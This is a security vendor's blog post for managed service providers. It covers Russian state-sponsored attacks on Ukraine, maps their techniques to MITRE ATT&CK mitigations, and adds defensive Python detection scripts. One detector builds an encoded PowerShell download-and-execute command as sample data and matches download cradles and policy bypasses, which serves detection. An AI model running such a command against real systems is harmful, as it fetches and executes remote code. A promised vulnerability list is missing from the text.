What MSPs Need to Know regarding Potential Russian Cyber Warfare

February 22, 2022

by Bryson Medlock


Intelligence suggests Russia has already used cyberwarfare techniques against Ukraine as tensions continue to escalate. Considering this, what threats do MSPs and their clients realistically face? Below we summarize actions already taken by Russian state-sponsored threat actors and provide some information on what can be expected going forward.

Recent Cyber Attacks Targeting Ukraine

Beginning January 13, 2022, the Microsoft Threat Intelligence Center (MSTIC) observed a new destructive malware operation (dubbed WhisperGate) targeting multiple Ukrainian organizations. The malware operates in two stages. Stage 1 overwrites the Master Boot Record (MBR) of the system disk with a ransom note that includes a Bitcoin address and a Tox ID (Tox is an encrypted peer-to-peer messaging protocol); when the system reboots, the note is displayed instead of the operating system. Stage 2 locates common file types likely to contain user data and overwrites their contents. Because WhisperGate overwrites rather than encrypts, the data cannot be recovered even if the ransom is paid: the ransom note is a decoy, not a business model.

On January 14, 2022, threat actors attempted to deface nearly 70 Ukrainian government websites, including those of the Ministry of Foreign Affairs, the Ministry of Defense, the State Emergency Service, and others. They managed to deface about 10 and left vague messages telling Ukrainians to “expect the worst”. This activity has been attributed to UNC1151, a threat actor group believed to be linked to Belarusian intelligence and also believed to be associated with the Russian special services. The messages, posted in Ukrainian, Russian, and Polish, appear to be an attempt to stoke tension between Ukrainians and the country's Polish minority.

On February 15, 2022, a large-scale DDoS attack targeted Ukraine’s armed forces, defense ministry, public radio, and two of the country's largest banks (PrivatBank and Oschadbank) for several hours. The attack took several vital services offline and left many Ukrainians unable to access their bank accounts, use mobile apps, or make online payments. During the DDoS attack, PrivatBank customers reported receiving SMS alerts claiming the bank's ATMs were not working. PrivatBank stated that it did not send these messages, and the Ukrainian cyber police described them as “an information attack”: the DDoS and the fake alerts were coordinated to amplify the disruption.

Though no recent attack on the Ukrainian power grid has been observed, many expect one similar to the December 2015 attack, attributed to the APT group known as Sandworm, which left about 230,000 people without electricity for up to six hours.

Potential Risks to MSPs and their Clients

Based on the activity so far, Russian state-sponsored APTs have focused on defense contractors, critical infrastructure (such as internet infrastructure or the power grid), government, and banking targets. MSPs with clients in these sectors should review the information below on the common vulnerabilities, tactics, and techniques used by Russian state-sponsored APTs. We have also seen in recent years that MSPs are increasingly targeted directly, as threat actors have realized that an MSP is critical infrastructure for its clients and that compromising one yields access to many victims at once.

Vulnerabilities commonly exploited by Russian state-sponsored APTs:

Below is a list of vulnerabilities commonly exploited by Russian state-sponsored APTs, according to a report by the Cybersecurity and Infrastructure Security Agency (CISA) (alert AA22-011A). Detection signatures for all of these vulnerabilities are available to Perch IDS customers in the “Emerging Threats” and “Perch Users” communities, both of which are enabled by default. We recommend auditing your systems and your clients’ systems for the following vulnerabilities, especially for organizations in critical infrastructure, government, defense contracting, and financial services. Keep in mind that this is not a comprehensive list of every method these threat actors might use but a guide to help focus attention on where to start.

MITRE ATT&CK Mappings of Russian State-Sponsored APTs

Below is a summary of common Tactics and Techniques observed in use by Russian state-sponsored APT groups, based on the same CISA report, with some additions from the ConnectWise Cyber Research Unit (CRU), each linked to mitigations that can be deployed to help offset the associated risk. Detection signatures for techniques under the “Initial Access”, “Execution”, and “Persistence” Tactics are available to Perch SIEM customers in the “ConnectWise CRU” collection in the Perch Marketplace. These signatures require the Perch Log Shipper with Sysmon as a prerequisite.

Each entry below gives the Tactic, the Technique, the observed Procedure, and the corresponding Mitigations.

TA0043 - Reconnaissance

T1595.002 - Active Scanning: Vulnerability Scanning

Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers.

M1056 - Pre-compromise: This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.

T1598 - Phishing for Information

Russian state-sponsored APT actors have conducted spearphishing campaigns to obtain credentials for target networks.

M1054 - Software Configuration: Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross-domain) to perform similar message filtering and validation.

M1017 - User Training: Users can be trained to identify social engineering techniques and spearphishing attempts.
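As an added illustration of the M1054 controls above (this is example code, not from the original post or from ConnectWise), the following Python script evaluates a domain's published SPF and DMARC records and flags the settings that still leave spoofed mail deliverable. The records and domain names are constructed for the example; in practice you would feed it the TXT records returned by a DNS lookup of the domain and of its `_dmarc` subdomain.

```python
"""Assess published SPF and DMARC records for weak settings (added example)."""
import re

# Constructed sample TXT records, as a DNS lookup would return them.
# The domains are placeholders, not real customers.
SAMPLE_TXT = {
    "weak.example": {
        "@": "v=spf1 include:_spf.example.net ?all",
        "_dmarc": "v=DMARC1; p=none; pct=50",
    },
    "strong.example": {
        "@": "v=spf1 include:_spf.example.net -all",
        "_dmarc": "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; rua=mailto:dmarc@strong.example",
    },
}

# SPF terms that cost a DNS lookup (RFC 7208 caps these at 10 per evaluation).
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a$|a:|mx$|mx:|ptr|exists:|redirect=)", re.I)


def parse_tags(record):
    """Split a 'k=v; k2=v2' DMARC record into a dict (RFC 7489 tag syntax)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spf(record):
    """Return a list of weaknesses in an SPF record (empty list = no findings)."""
    if record is None or not record.lower().startswith("v=spf1"):
        return ["no SPF record"]
    findings = []
    terms = record.split()
    all_term = next((t for t in terms if t.lower().endswith("all")), None)
    if all_term is None:
        findings.append("SPF has no 'all' mechanism; unlisted senders are treated as neutral")
    elif all_term.lower() in ("+all", "all", "?all"):
        findings.append(f"SPF '{all_term}' does not reject unlisted senders; spoofed mail passes")
    elif all_term.lower() == "~all":
        findings.append("SPF '~all' only softfails spoofed mail; prefer '-all' once senders are enumerated")
    lookups = sum(1 for t in terms if LOOKUP_TERM.match(t))
    if lookups > 10:
        findings.append(f"SPF needs {lookups} DNS lookups; the RFC 7208 limit is 10 (permerror)")
    return findings


def assess_dmarc(record):
    """Return a list of weaknesses in a DMARC record (empty list = no findings)."""
    if record is None or not record.upper().startswith("V=DMARC1"):
        return ["no DMARC record"]
    findings = []
    tags = parse_tags(record)
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        findings.append("DMARC record has no valid 'p=' tag")
    elif policy == "none":
        findings.append("p=none only monitors; spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("p=quarantine; move to p=reject once reports show no legitimate failures")
    if tags.get("pct", "100") != "100":
        findings.append(f"pct={tags['pct']} applies the policy to only part of the failing mail")
    if "rua" not in tags:
        findings.append("no rua= address; you receive no aggregate reports to tune the policy")
    if tags.get("sp", policy).lower() == "none" and policy != "none":
        findings.append("sp=none leaves subdomains unprotected")
    return findings


def assess_domain(domain, txt=SAMPLE_TXT):
    """Combine the SPF and DMARC assessments for one domain."""
    records = txt.get(domain, {})
    return {"spf": assess_spf(records.get("@")), "dmarc": assess_dmarc(records.get("_dmarc"))}


if __name__ == "__main__":
    for name in SAMPLE_TXT:
        print(name, assess_domain(name))
```

The check is deliberately conservative: it reports `p=quarantine` as a finding rather than a pass, because a spoofed message that lands in a junk folder is still a message the user can open.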

TA0042 - Resource Development

T1587.001 - Develop Capabilities: Malware

Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware.

M1056 - Pre-compromise: This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.

TA0001 - Initial Access

T1190 - Exploit Public Facing Applications

Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks.

M1048 - Application Isolation and Sandboxing: Application isolation will limit what other processes and system features the exploited target can access.

M1050 - Exploit Protection: Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.

M1030 - Network Segmentation: Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

M1026 - Privileged Account Management: Running service accounts with least privilege limits what permissions an exploited process gets on the rest of the system.

M1051 - Update Software: Update software regularly by employing patch management for externally exposed applications.

M1016 - Vulnerability Scanning: Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain

Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include the M.E.Doc accounting software update channel (NotPetya, 2017) and SolarWinds Orion (2020).

M1051 - Update Software: Implement a patch management process that also identifies unused applications, unmaintained or previously vulnerable software, and unnecessary features, components, files, and documentation so they can be removed.

M1016 - Vulnerability Scanning: Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.

TA0002 - Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

Russian state-sponsored APT actors have used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.

M1049 - Antivirus/Antimalware: Anti-virus can be used to automatically quarantine suspicious files.

M1045 - Code Signing: Set PowerShell execution policy to execute only signed scripts.

M1042 - Disable or Remove Feature or Program: It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

M1038 - Execution Prevention: Use application control where appropriate.

M1026 - Privileged Account Management: When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.
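An added example (not part of the original page or of the Perch signature set) of the detection logic the mitigations above still leave you needing: it reads Sysmon Event ID 1 process-creation records, decodes a `-EncodedCommand` payload back to plaintext so the same patterns can be applied to what actually runs, and flags remote execution by its WinRM parent process (wsmprovhost.exe). The events, hostnames, paths and URL are constructed for the example.

```python
"""Flag suspicious PowerShell process creations in Sysmon Event ID 1 data (added example)."""
import base64
import re

# Constructed encoded payload: PowerShell's -EncodedCommand takes base64 of
# the UTF-16LE script text. This one decodes to a download cradle.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')".encode("utf-16-le")
).decode()

# Constructed Sysmon Event ID 1 (ProcessCreate) records, reduced to the fields used here.
EVENTS = [
    {"EventID": 1, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -enc " + ENCODED},
    {"EventID": 1, "Computer": "SRV02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\t.ps1"},
    {"EventID": 1, "Computer": "WS03",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"EventID": 1, "Computer": "WS03",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")
# A PowerShell child of wsmprovhost.exe was started through WinRM / PowerShell Remoting.
REMOTE_PARENTS = ("wsmprovhost.exe",)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match all of them.
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)
SUSPICIOUS_PATTERNS = [
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-ex(?:ecutionpolicy)?\s+bypass", "execution policy bypass"),
    (r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b)", "download cradle"),
    (r"(?i)(?:invoke-expression|\biex\b)", "Invoke-Expression"),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the reasons a process-creation event looks suspicious (empty list = benign)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if event["EventID"] != 1 or image not in POWERSHELL_IMAGES:
        return []
    reasons = []
    cmd = event["CommandLine"]
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in REMOTE_PARENTS:
        reasons.append(f"remote execution via WinRM (parent {parent})")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command: " + decoded)
        cmd = cmd + " " + decoded  # apply the same patterns to the decoded payload
    for pattern, why in SUSPICIOUS_PATTERNS:
        if re.search(pattern, cmd):
            reasons.append(why)
    return reasons


def find_suspicious(events=EVENTS):
    """Return (hostname, reasons) for every event that scored at least one reason."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event["Computer"], reasons))
    return hits


if __name__ == "__main__":
    for host, reasons in find_suspicious():
        print(host, "->", "; ".join(reasons))
```

The inventory script on WS03 scores nothing, which is the behaviour you want: the rules key on how PowerShell is invoked (encoding, hidden window, policy bypass, remote parent, download cradle), not on PowerShell itself, since removing or blocking it outright usually breaks legitimate administration.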

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Russian state-sponsored APT actors have used cmd.exe to execute commands on remote machines.

M1038 - Execution Prevention: Use application control where appropriate.

TA0003 - Persistence

T1078 - Valid Accounts

Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks.

M1013 - Application Developer Guidance: Ensure that applications do not store sensitive data or credentials insecurely (e.g., plaintext credentials in code, credentials published in repositories, or credentials in public cloud storage).

M1027 - Password Policies: Default usernames and passwords on applications and appliances should be changed immediately after installation and before deployment to a production environment. Where possible, SSH keys used by applications should be rotated periodically and properly secured.

M1026 - Privileged Account Management: Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. These audits should also include if default accounts have been enabled, or if new local accounts are created that have not been authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

M1017 - User Training: Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.

TA0006 - Credential Access

T1110.001 - Brute Force: Password Guessing

Russian state-sponsored APT actors have conducted brute-force password guessing campaigns.

M1036 - Account Use Policies: Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.

M1032 - Multi-factor Authentication: Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.

M1027 - Password Policies: Refer to NIST guidelines when creating password policies.

T1110.003 - Brute Force: Password Spraying

Russian state-sponsored APT actors have conducted password spraying campaigns.

M1036 - Account Use Policies: Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.

M1032 - Multi-factor Authentication: Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.

M1027 - Password Policies: Refer to NIST guidelines when creating password policies.
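The two techniques above differ in exactly the dimension that account lockout measures, so here is one added example covering both T1110.001 and T1110.003 (example code, not from the original page): given Windows Event ID 4625 logon-failure records it separates guessing (many failures against one account from one source) from spraying (one attempt each across many accounts from one source) and reports which accounts an assumed lockout threshold of five would have locked. In the constructed data the spray never reaches the threshold, which is the point of the caveat in M1036: lockout alone does not catch spraying, so the detection has to count distinct accounts per source. Timestamps, addresses and user names are made up.

```python
"""Separate password guessing from password spraying in Windows 4625 data (added example)."""
from collections import defaultdict
from datetime import datetime


def stamp(hms):
    """Build a timestamp on the (constructed) day of the sample data."""
    return datetime.fromisoformat("2022-02-15T" + hms)


# Constructed Event ID 4625 records: (time, source address, target account, status).
# 0xC000006A is the status for a wrong password.
FAILED_LOGONS = (
    # 203.0.113.9 hammers a single account: guessing (T1110.001)
    [(stamp(f"09:00:{i:02d}"), "203.0.113.9", "svc_backup", "0xC000006A") for i in range(12)]
    # 198.51.100.20 tries one password against 40 accounts: spraying (T1110.003)
    + [(stamp(f"09:1{i // 10}:{(i % 10) * 6:02d}"), "198.51.100.20", f"user{i:02d}", "0xC000006A")
       for i in range(40)]
    # a user who mistyped twice: noise that must not alert
    + [(stamp("09:05:00"), "10.0.0.5", "jsmith", "0xC000006A"),
       (stamp("09:05:20"), "10.0.0.5", "jsmith", "0xC000006A")]
)

LOCKOUT_THRESHOLD = 5      # assumed domain lockout policy: failures per account before lockout
GUESS_MIN_FAILURES = 10    # failures against one account from one source within a window
SPRAY_MIN_ACCOUNTS = 20    # distinct accounts tried from one source within a window


def _window(ts):
    """Fixed 15-minute bucket; a sliding window would be stricter but is not needed here."""
    return ts.replace(minute=(ts.minute // 15) * 15, second=0, microsecond=0)


def analyze(events=FAILED_LOGONS, lockout_threshold=LOCKOUT_THRESHOLD):
    """Return alerts keyed by (source address, window start) with the detected pattern."""
    failures = defaultdict(lambda: defaultdict(int))   # (src, window) -> account -> count
    for ts, src, account, _status in events:
        failures[(src, _window(ts))][account] += 1

    alerts = {}
    for key, per_account in failures.items():
        worst = max(per_account.values())
        locked = sorted(a for a, n in per_account.items() if n >= lockout_threshold)
        summary = {"accounts": len(per_account), "max_failures_per_account": worst,
                   "accounts_locked": locked}
        if worst >= GUESS_MIN_FAILURES:
            alerts[key] = dict(summary, pattern="password guessing")
        elif len(per_account) >= SPRAY_MIN_ACCOUNTS:
            alerts[key] = dict(summary, pattern="password spraying")
    return alerts


if __name__ == "__main__":
    for (src, window), alert in analyze().items():
        print(f"{src} {window:%H:%M}: {alert['pattern']}, {alert['accounts']} account(s), "
              f"max {alert['max_failures_per_account']} failures each, locked: {alert['accounts_locked']}")
```

On a real SIEM the same counting runs against the Security log of each domain controller (or, for Azure AD, sign-in logs), and the source field needs care: sprays against RDP or VPN gateways often surface with the gateway's address as the source, so the per-source count should also be done per workstation name where the event carries one.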

T1003.003 - OS Credential Dumping: NTDS

Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit.

M1041 - Encrypt Sensitive Information: Ensure Domain Controller backups are properly secured.

M1027 - Password Policies: Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

M1026 - Privileged Account Management: Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

M1017 - User Training: Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Russian state-sponsored APT actors have performed “Kerberoasting,” whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.

M1041 - Encrypt Sensitive Information: Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.

M1027 - Password Policies: Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. Also, consider using Group Managed Service Accounts or another third-party product such as password vaulting.

M1026 - Privileged Account Management: Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.
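An added example for detecting the Kerberoasting procedure above (example code, not from the original page): over Windows Event ID 4769 service-ticket records it counts the distinct service accounts for which one caller requested RC4 tickets (encryption type 0x17), ignoring krbtgt, computer accounts and the caller's own account, and alerts when the count crosses a threshold. The records, names and addresses are constructed. Once AES is enforced on service accounts as M1041 recommends, any 0x17 ticket request becomes an anomaly on its own and the threshold can be lowered to one.

```python
"""Spot Kerberoasting in Windows Event ID 4769 service-ticket data (added example)."""
from collections import defaultdict

# Kerberos encryption type values as logged in the 4769 TicketEncryptionType field.
RC4_HMAC = "0x17"
AES256 = "0x12"

# Constructed 4769 records: (requesting account, service name, ticket encryption type, client address).
TGS_REQUESTS = (
    # one user pulls RC4 tickets for eight different service accounts within minutes
    [("jdoe@CORP", f"svc_{name}", RC4_HMAC, "10.0.0.15")
     for name in ("sql01", "sql02", "web01", "backup", "sccm", "exchange", "ftp", "iis01")]
    + [("jdoe@CORP", "jdoe", RC4_HMAC, "10.0.0.15")]       # ticket for the caller's own account: ignored
    + [("alice@CORP", "svc_sql01", AES256, "10.0.0.22")]   # ordinary AES ticket: ignored
    + [("WS07$@CORP", "krbtgt", AES256, "10.0.0.7")]        # krbtgt / computer account noise: ignored
)

# Distinct service accounts per caller before alerting. Legitimate users rarely
# touch more than a handful of SPN-bearing accounts in a short window.
MIN_DISTINCT_SERVICES = 5


def is_roast_candidate(user, service, etype):
    """True for an RC4 ticket for a human-managed service account other than the caller."""
    svc = service.lower()
    if etype.lower() != RC4_HMAC:
        return False
    if svc == "krbtgt" or svc.endswith("$"):
        # TGTs and computer accounts (120-character random passwords) are not crackable offline
        return False
    if svc == user.split("@")[0].lower():
        return False
    return True


def detect(requests=TGS_REQUESTS, threshold=MIN_DISTINCT_SERVICES):
    """Return {(caller, client address): [service accounts]} for callers over the threshold."""
    services = defaultdict(set)
    for user, service, etype, addr in requests:
        if is_roast_candidate(user, service, etype):
            services[(user, addr)].add(service)
    return {key: sorted(names) for key, names in services.items() if len(names) >= threshold}


if __name__ == "__main__":
    for (user, addr), names in detect().items():
        print(f"{user} from {addr} requested RC4 tickets for {len(names)} services: {', '.join(names)}")
```

When you roll out the AES mitigation, run this with a threshold of one for a few days first: the accounts that still show up with 0x17 tickets are the ones whose msDS-SupportedEncryptionTypes, or whose client software, still needs fixing before you can alert on every RC4 request.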

T1555 - Credentials from Password Stores

Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords.

M1027 - Password Policies: On macOS, the password for the user's login keychain can be set to differ from the user's login password; this raises the bar for an adversary, who then needs an additional password. Organizations should weigh the risk of storing credentials in password stores and web browsers. If disclosure of system, software, or browser-stored credentials is a significant concern, technical controls, policy, and user training can be used to prevent storage of credentials in improper locations.

T1212 - Exploitation for Credential Access

Russian state-sponsored APT actors have exploited the Windows Netlogon vulnerability CVE-2020-1472 (Zerologon) to obtain access to Windows Active Directory domain controllers.

M1048 - Application Isolation and Sandboxing: Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist.

M1050 - Exploit Protection: Security applications that look for behavior used during exploitation, such as Windows Defender Exploit Guard (WDEG) and its predecessor, the Enhanced Mitigation Experience Toolkit (EMET, now end-of-life), can be used to mitigate some exploitation behavior. Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

M1019 - Threat Intelligence Program: Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.

M1051 - Update Software: Update software regularly by employing patch management for internal enterprise endpoints and servers.

T1552.004 - Unsecured Credentials: Private Keys

Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates.

M1047 - Audit: Ensure only authorized keys are allowed access to critical resources and audit access lists regularly.

M1041 - Encrypt Sensitive Information: When possible, store keys on separate cryptographic hardware instead of on the local system.

M1027 - Password Policies: Use strong passphrases for private keys to make cracking difficult.

M1022 - Restrict File and Directory Permissions: Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access.

TA0011 - Command and Control

T1090.003 - Proxy: Multi-hop Proxy

Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.

M1037 - Filter Network Traffic: Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like Domain Fronting.

TA0040 - Impact

T1561.002 - Disk Wipe: Disk Structure Wipe

Russian state-sponsored APT actors have used new malware in a campaign known as WhisperGate that will overwrite the Master Boot Record (MBR) on victim systems with a ransom note. The malware appears to be ransomware at first glance, but this malware destroys the data rather than encrypting it.

M1053 - Data Backup: Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1485 - Data Destruction

Russian state-sponsored APT actors have used new malware in a campaign known as WhisperGate that locates common file types on the infected system and then overwrites the files, so they are unrecoverable.

M1053 - Data Backup: Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1491.002 - Defacement: External Defacement

Nearly 70 Ukrainian government websites were targeted for defacement with vague warnings to “expect the worst”. This activity has been attributed to a Belarusian APT suspected of pursuing Russian objectives.

M1053 - Data Backup: Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1498.001 - Network Denial of Service: Direct Network Flood

Russian state-sponsored APT actors launched a DDoS attack targeting Ukrainian armed forces, defense ministry, public radio, and financial institutions.

M1037 - Filter Network Traffic: When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted or blocking protocols being used for transport.

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.


References:

https://www.cisa.gov/uscert/ncas/alerts/aa22-011a

https://www.ncsc.gov.uk/news/russia-ddos-involvement-in-ukraine

https://support.recordedfuture.com/hc/en-us/articles/4434859363603

https://therecord.media/hackers-deface-ukrainian-government-websites/

https://www.reuters.com/world/europe/exclusive-ukraine-suspects-group-linked-belarus-intelligence-over-cyberattack-2022-01-15/

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://cyberpolice.gov.ua/news/kiberpolicziya-vstanovlyuye-osib-prychetnyx-do-rozsylannya-sms-povidomlen-shhodo-zboyiv-u-roboti-bankomativ-7072/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf